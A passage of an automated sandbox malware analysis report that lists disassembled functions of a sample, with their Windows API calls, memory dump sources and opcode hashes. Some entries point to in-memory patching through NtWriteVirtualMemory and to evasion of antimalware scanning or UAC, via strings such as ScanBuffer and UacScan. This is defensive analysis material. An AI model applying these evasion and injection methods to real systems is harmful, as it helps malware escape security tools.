                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02DB4D6D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1429ca7c6c8c6cfe61ba300637cdf7adbfd81ea147eb5b48742e0cdfece7e00e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE08CB8601201DEEA0AAF218870ABA322AEFC1B41F14C498A802CA310D738CC00AD38
                                                                                                                                                                                                                                                                                                                                  Function 02DC70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02DC73DA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3cd3a34194db0859d6b0f23a1ba2772e3e2c3a75eb2b44d4442eb718d7283586
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: feed3dab87df3f396c0f125ead22a011db87e882d79171ba14e85e3b24a0bdcf
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cd3a34194db0859d6b0f23a1ba2772e3e2c3a75eb2b44d4442eb718d7283586
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B1DC74A01609DFEB11CFA9E480A9DFBBAFF89314F248169E855AB324D730AC45CF50
                                                                                                                                                                                                                                                                                                                                  Function 02DBE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02DBE781
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBE364: VariantClear.OLEAUT32(?), ref: 02DBE373
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d219764d28b140a216be6aa92463a587a4df37144d1e61e2b79933a07f3cd03
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffed062bfefa469e949d56ac0606e6e3f9af54136d84f36c587b75c972e879bc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d219764d28b140a216be6aa92463a587a4df37144d1e61e2b79933a07f3cd03
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B511A964710610CBCB33AF29C8E4AE677DAEF84750F90846AE54B8B716DB30CC41CA71
                                                                                                                                                                                                                                                                                                                                  Function 02DBE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c051c7ccfe06b7ef7af4d1fe07d3ebc400e182b1f82216553cff0c48f962e640
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: da47586208fa8566e15ae32e7f5f393c622abd49087b4b14b0b4a7eb044abdc8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c051c7ccfe06b7ef7af4d1fe07d3ebc400e182b1f82216553cff0c48f962e640
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79314C71A00219EFDB12DFA8D8A8AEA77A8EF0C304F944565E94AD3340D734DD50CBA1
                                                                                                                                                                                                                                                                                                                                  Function 02DC89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06790c89a3a632d084531be27cfcae17dc6fabb36de72943e8e3cdad31144f99
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d8aa194aa4d9ece74ddf9d4269f9be9bd45bbb599337cec7f878d6ed379ee61
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06790c89a3a632d084531be27cfcae17dc6fabb36de72943e8e3cdad31144f99
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9212FB0AC0205BAFB42EBB5DC26B9EB7DADF04701F605468B505E7380DA74AD409E68
                                                                                                                                                                                                                                                                                                                                  Function 02DC6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02DC6DB9,?,?,?,00000000), ref: 02DC6D99
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeFromProgString
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4225568880-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 95cdb8b2864b5eb9c4c95f2b0b52fa00a62c77b4433089ea05c639d952adcbc8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 75f5d410e9ef3539a385bc7cfa18a9a6aa947bfc2a0ae1aa23209d8d8c671b60
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95cdb8b2864b5eb9c4c95f2b0b52fa00a62c77b4433089ea05c639d952adcbc8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75E0E535600208BFE712EB62EC61D8E77ADDFCA710F6104B5E40193700E975AD0488B0
                                                                                                                                                                                                                                                                                                                                  Function 02DB5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DB5886
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5AE8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B06
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B24
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5B42
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B8B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegQueryValueExA.ADVAPI32(?,02DB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001), ref: 02DB5BA9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB5ACC: RegCloseKey.ADVAPI32(?,02DB5BD8,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5BCB
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2796650324-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1813bf42b4283f0e3e60af16beac1b669039d8b296f41cbb213c08f7ad564559
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E032B1A00214CBCB11DEA8D8D0A863398AF08750F4409A1AC69DF34AD7B1DE208BE0
                                                                                                                                                                                                                                                                                                                                  Function 02DB7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DB7DF4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 94e87805ecc4f1aca75f88026ed87b81891f4cb7178745e769769884caee809b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16D012B62091506AE225965A5D44EE75ADCCFC6770F10062DF558C6280D6208C01C6B1
                                                                                                                                                                                                                                                                                                                                  Function 02DBC364 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F2B8B8,?,02DD0751,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession), ref: 02DBC37B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 514040917-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3818fc34a582c407a61fce0ad44f420a5e60d8709c0364907f1d5cfe12aef04d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fcf8b56b1c761ce497465a2eb80e153684969ae2f85f49d24c4f79c159b4ca2b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3818fc34a582c407a61fce0ad44f420a5e60d8709c0364907f1d5cfe12aef04d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4D0A7A270051417D201D16C0C918FB31CD8F88650F0001216999C6381F9508E0006E1
                                                                                                                                                                                                                                                                                                                                  Function 02DB7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02DD356F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,Initialize), ref: 02DB7E8B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 293aa77a7d6da3b19ba7d9126c77eb54a59076424d0e0964b47b095df0aba2f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C08CF72122028B7E62A5BC5CE42D943898DC8134B601E61E43ACA3C2E326DC222830
                                                                                                                                                                                                                                                                                                                                  Function 02DB7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f506675f3d5e98c681e726eb5e96af138d53fc590ee87c078ade177017d31d6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C080A5201101477D5155BC1CE42C551898D441347540A51E436C63D2D321DC525420
                                                                                                                                                                                                                                                                                                                                  Function 02DB4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
